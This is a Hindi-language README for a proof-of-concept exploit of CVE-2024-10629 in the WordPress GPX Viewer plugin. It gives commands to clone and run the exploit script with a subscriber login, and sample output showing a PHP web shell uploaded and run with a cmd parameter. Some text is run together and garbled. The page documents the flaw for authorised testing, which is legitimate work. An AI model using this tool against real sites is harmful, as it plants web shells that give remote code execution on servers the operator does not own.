
GPX Viewer <= 2.2.8 - प्रमाणित (सदस्य+) मनमाना फ़ाइल निर्माण
यह रिपॉजिटरी वर्डप्रेस के GPX Viewer प्लगइन के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट है, जो मनमानी फ़ाइल निर्माण (CVE-2024-10629) के लिए संवेदनशील है। यह कमजोरी प्रमाणित हमलावरों को सब्सक्राइबर-स्तर और उससे ऊपर की पहुंच के साथ प्रभावित साइट के सर्वर पर मनमानी फ़ाइलें बनाने की अनुमति देती है, जो संभावित रूप से रिमोट कोड निष्पादन का कारण बन सकती है।
GPX Viewer प्लगइन वर्डप्रेस के लिए gpxv_file_upload() फ़ंक्शन में क्षमता जांच और फ़ाइल प्रकार सत्यापन की कमी के कारण मनमानी फ़ाइल निर्माण के लिए संवेदनशील है, जो सभी संस्करणों में 2.2.8 तक और शामिल है। यह प्रमाणित हमलावरों, सब्सक्राइबर-स्तर और उससे ऊपर की पहुंच के साथ, प्रभावित साइट के सर्वर पर मनमानी फ़ाइलें बनाने में सक्षम बनाता है जो रिमोट कोड निष्पादन संभव बना सकता है।
requests लाइब्रेरीरिपॉजिटरी क्लोन करें:
git clone https://github.com/Nxploited/CVE-2024-10629/
cd CVE-2024-10629
आवश्यक लाइब्रेरी स्थापित करें:
pip install requests
एक्सप्लॉइट चलाएं:
python exploit.py -u <target_url> -un <username> -p <password>
<target_url>, <username>, और <password> को उपयुक्त मानों से बदलें।
python CVE-2024-10629.py -u http://example.com/wordpress -un subscriber -p subscriber_password
ls) निष्पादित करेगी।[+] WordPress plugin version: 2.2.8
[+] Vulnerable version detected. Proceeding with exploitation...
[+] Logged in successfully.
[+] Shell uploaded. Checking shell...
[+] Shell uploaded successfully.
[+] Shell URL: http://example.com/wp-content/uploads/gpx/uncategorized/nxploit_exploit.php
[+] Command output:
http://example.com/wp-content/uploads/gpx/uncategorized/nxploit_exploit.php?cmd=ls
index.php
wp-admin
wp-content
wp-includes
...
ls = फ़ाइलें दिखाएंuname -a = सिस्टम जानकारी दिखाएंयह एक्सप्लॉइट केवल शैक्षिक उद्देश्यों और अधिकृत परीक्षण के लिए है। इस एक्सप्लॉइट का अनधिकृत उपयोग उन प्रणालियों के विरुद्ध जिनके आप मालिक नहीं हैं या जिनका परीक्षण करने की स्पष्ट अनुमति नहीं है, अवैध और अनैतिक है। इस रिपॉजिटरी के लेखक और योगदानकर्ता इस एक्सप्लॉइट के कारण होने वाले किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं हैं।
द्वारा: खालिद अलेनाज़ी (Nxploit)